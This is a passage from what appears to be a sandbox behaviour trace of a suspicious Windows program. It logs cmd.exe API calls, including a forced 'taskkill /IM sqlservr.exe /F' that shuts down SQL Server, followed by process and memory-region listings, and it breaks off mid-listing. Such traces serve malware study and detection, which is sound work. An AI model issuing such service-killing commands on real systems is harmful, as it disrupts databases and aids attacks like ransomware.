0x1b [0126.978] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0126.978] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0126.978] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0126.978] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0126.978] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0126.978] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0126.978] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0126.978] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0126.978] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0126.978] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0126.978] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0126.978] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0126.978] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0126.978] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0126.978] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0126.978] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0126.978] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0126.978] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0126.978] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0126.978] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0126.978] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0126.978] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0126.978] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0126.978] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0126.978] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0126.978] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0126.978] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0126.978] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0126.978] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0126.978] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0126.978] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0126.978] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0126.978] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0126.978] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0126.978] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0126.978] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0126.978] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0126.978] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0126.978] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0126.978] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0126.978] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0126.978] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0126.978] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0126.979] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0126.979] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0126.979] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0126.979] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0126.979] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0126.979] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0126.979] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0126.979] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0126.979] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0126.979] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0126.979] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0126.979] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0126.979] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0126.979] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0126.979] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0126.979] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0126.979] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0126.979] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0126.979] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0126.979] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0126.979] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0126.979] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0126.979] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0126.979] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0126.979] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0126.979] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0126.979] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0126.979] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0126.979] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0126.979] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0126.979] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0126.979] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0126.979] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0126.979] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0126.979] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0126.979] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0126.979] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0126.979] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0126.979] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0126.979] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0126.979] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0126.979] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0126.979] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0126.979] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0126.980] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0126.980] SetErrorMode (uMode=0x0) returned 0x0 [0126.980] SetErrorMode (uMode=0x1) returned 0x0 [0126.980] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4faaf48, lpFilePart=0x4cfed7c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4cfed7c*="Desktop") returned 0x1d [0126.980] SetErrorMode (uMode=0x0) returned 0x1 [0126.980] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0126.980] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0126.987] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0126.987] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0126.987] GetConsoleTitleW (in: lpConsoleTitle=0x4cfeffc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.988] InitializeProcThreadAttributeList (in: lpAttributeList=0x4cfef28, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4cfef0c | out: lpAttributeList=0x4cfef28, lpSize=0x4cfef0c) returned 1 [0126.988] UpdateProcThreadAttribute (in: lpAttributeList=0x4cfef28, dwFlags=0x0, Attribute=0x60001, lpValue=0x4cfef14, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4cfef28, lpPreviousValue=0x0) returned 1 [0126.988] GetStartupInfoW (in: lpStartupInfo=0x4cfef60 | out: lpStartupInfo=0x4cfef60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0126.988] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0126.989] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0126.990] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill \\/IM sqlservr.exe \\/F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4cfeeb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill \\/IM sqlservr.exe \\/F", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4cfeefc | out: lpCommandLine="taskkill \\/IM sqlservr.exe \\/F", lpProcessInformation=0x4cfeefc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd58, dwThreadId=0xdac)) returned 1 [0126.996] CloseHandle (hObject=0xa4) returned 1 [0126.996] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0126.996] GetEnvironmentStringsW () returned 0x4fa9ee0* [0126.996] FreeEnvironmentStringsA (penv="=") returned 1 [0126.996] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0127.094] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4cfee94 | out: lpExitCode=0x4cfee94*=0x1) returned 1 [0127.094] CloseHandle (hObject=0xa8) returned 1 [0127.094] _vsnwprintf (in: _Buffer=0x4cfef7c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4cfee9c | out: _Buffer="00000001") returned 8 [0127.094] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0127.094] GetEnvironmentStringsW () returned 0x4fab3d0* [0127.094] FreeEnvironmentStringsA (penv="=") returned 1 [0127.094] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.094] GetEnvironmentStringsW () returned 0x4fab3d0* [0127.094] FreeEnvironmentStringsA (penv="=") returned 1 [0127.094] DeleteProcThreadAttributeList (in: lpAttributeList=0x4cfef28 | out: lpAttributeList=0x4cfef28) [0127.094] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.094] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0127.095] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.095] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0127.095] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.095] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0127.096] SetConsoleInputExeNameW () returned 0x1 [0127.096] GetConsoleOutputCP () returned 0x1b5 [0127.096] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.096] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.096] exit (_Code=1) Thread: id = 367 os_tid = 0xd60 Process: id = "90" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x9445000" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "89" os_parent_pid = "0xd7c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5648 start_va = 0x7fec5000 end_va = 0x7fec5fff entry_point = 0x0 region_type = private name = "private_0x000000007fec5000" filename = "" Region: id = 5649 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5650 start_va = 0x8b930e0000 end_va = 0x8b930fffff entry_point = 0x0 region_type = private name = "private_0x0000008b930e0000" filename = "" Region: id = 5651 start_va = 0x8b93100000 end_va = 0x8b93113fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008b93100000" filename = "" Region: id = 5652 start_va = 0x8b93120000 end_va = 0x8b9315ffff entry_point = 0x0 region_type = private name = "private_0x0000008b93120000" filename = "" Region: id = 5653 start_va = 0x7df5ffc70000 end_va = 0x7ff5ffc6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc70000" filename = "" Region: id = 5654 start_va = 0x7ff6c4650000 end_va = 0x7ff6c4672fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4650000" filename = "" Region: id = 5655 start_va = 0x7ff6c4677000 end_va = 0x7ff6c4677fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4677000" filename = "" Region: id = 5656 start_va = 0x7ff6c467e000 end_va = 0x7ff6c467ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c467e000" filename = "" Region: id = 5657 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5658 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5659 start_va = 0x8b93300000 end_va = 0x8b933fffff entry_point = 0x0 region_type = private name = "private_0x0000008b93300000" filename = "" Region: id = 5660 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5661 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5662 start_va = 0x8b930e0000 end_va = 0x8b930effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008b930e0000" filename = "" Region: id = 5663 start_va = 0x8b930f0000 end_va = 0x8b930f6fff entry_point = 0x0 region_type = private name = "private_0x0000008b930f0000" filename = "" Region: id = 5664 start_va = 0x8b93160000 end_va = 0x8b9321dfff entry_point = 0x8b93160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5665 start_va = 0x8b93220000 end_va = 0x8b9325ffff entry_point = 0x0 region_type = private name = "private_0x0000008b93220000" filename = "" Region: id = 5666 start_va = 0x8b93260000 end_va = 0x8b93260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008b93260000" filename = "" Region: id = 5667 start_va = 0x8b93270000 end_va = 0x8b93276fff entry_point = 0x0 region_type = private name = "private_0x0000008b93270000" filename = "" Region: id = 5668 start_va = 0x8b93280000 end_va = 0x8b93280fff entry_point = 0x0 region_type = private name = "private_0x0000008b93280000" filename = "" Region: id = 5669 start_va = 0x8b93290000 end_va = 0x8b93290fff entry_point = 0x0 region_type = private name = "private_0x0000008b93290000" filename = "" Region: id = 5670 start_va = 0x8b93400000 end_va = 0x8b93587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008b93400000" filename = "" Region: id = 5671 start_va = 0x8b935b0000 end_va = 0x8b935bffff entry_point = 0x0 region_type = private name = "private_0x0000008b935b0000" filename = "" Region: id = 5672 start_va = 0x8b935c0000 end_va = 0x8b93740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008b935c0000" filename = "" Region: id = 5673 start_va = 0x8b93750000 end_va = 0x8b94b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008b93750000" filename = "" Region: id = 5674 start_va = 0x7ff6c4550000 end_va = 0x7ff6c464ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4550000" filename = "" Region: id = 5675 start_va = 0x7ff6c467c000 end_va = 0x7ff6c467dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c467c000" filename = "" Region: id = 5676 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5677 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5678 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5679 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5680 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5681 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5682 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5683 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5684 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5685 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5686 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5687 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 364 os_tid = 0xd64 Thread: id = 365 os_tid = 0xd54 Thread: id = 366 os_tid = 0xd68 Process: id = "91" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x43383000" os_pid = "0xd58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "89" os_parent_pid = "0xd7c" cmd_line = "taskkill \\/IM sqlservr.exe \\/F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5701 start_va = 0x130000 end_va = 0x145fff entry_point = 0x130000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5702 start_va = 0x610000 end_va = 0x460ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5703 start_va = 0x4610000 end_va = 0x462ffff entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 5704 start_va = 0x4630000 end_va = 0x4631fff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 5705 start_va = 0x4640000 end_va = 0x4653fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004640000" filename = "" Region: id = 5706 start_va = 0x4660000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 5707 start_va = 0x46a0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 5708 start_va = 0x46e0000 end_va = 0x46e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 5709 start_va = 0x46f0000 end_va = 0x46f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046f0000" filename = "" Region: id = 5710 start_va = 0x4700000 end_va = 0x4701fff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 5711 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5712 start_va = 0x7ee20000 end_va = 0x7ee42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee20000" filename = "" Region: id = 5713 start_va = 0x7ee45000 end_va = 0x7ee45fff entry_point = 0x0 region_type = private name = "private_0x000000007ee45000" filename = "" Region: id = 5714 start_va = 0x7ee4c000 end_va = 0x7ee4efff entry_point = 0x0 region_type = private name = "private_0x000000007ee4c000" filename = "" Region: id = 5715 start_va = 0x7ee4f000 end_va = 0x7ee4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee4f000" filename = "" Region: id = 5716 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5717 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5718 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5719 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5720 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5721 start_va = 0x4790000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 5722 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5723 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5724 start_va = 0x47d0000 end_va = 0x48cffff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 5725 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" 